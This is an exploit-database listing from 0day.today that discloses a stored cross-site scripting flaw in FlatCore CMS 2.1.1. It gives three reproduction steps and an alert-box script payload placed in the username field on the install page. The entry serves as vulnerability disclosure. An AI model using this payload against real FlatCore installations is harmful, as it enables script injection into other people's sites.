[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FlatCore CMS 2.1.1 - Stored Cross-Site Scripting Vulnerability

Author
Sinem Şahin
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-38315
Category
web applications
Date add
27-03-2023
Platform
php
# Exploit Title: FlatCore CMS 2.1.1 -Stored Cross Site Scripting
# Exploit Author: Sinem Şahin
# Vendor Homepage: https://flatcore.org/
# Version: 2.1.1
# Tested on: Windows & XAMPP

==> Tutorial <==

1- Go to the following url. => http://(HOST)/install/index.php
2- Write XSS Payload into the username of the user account.
3- Press "Save" button.

XSS Payload ==> "<script>alert("usernameXSS")</script>

#  0day.today [2024-07-02]  #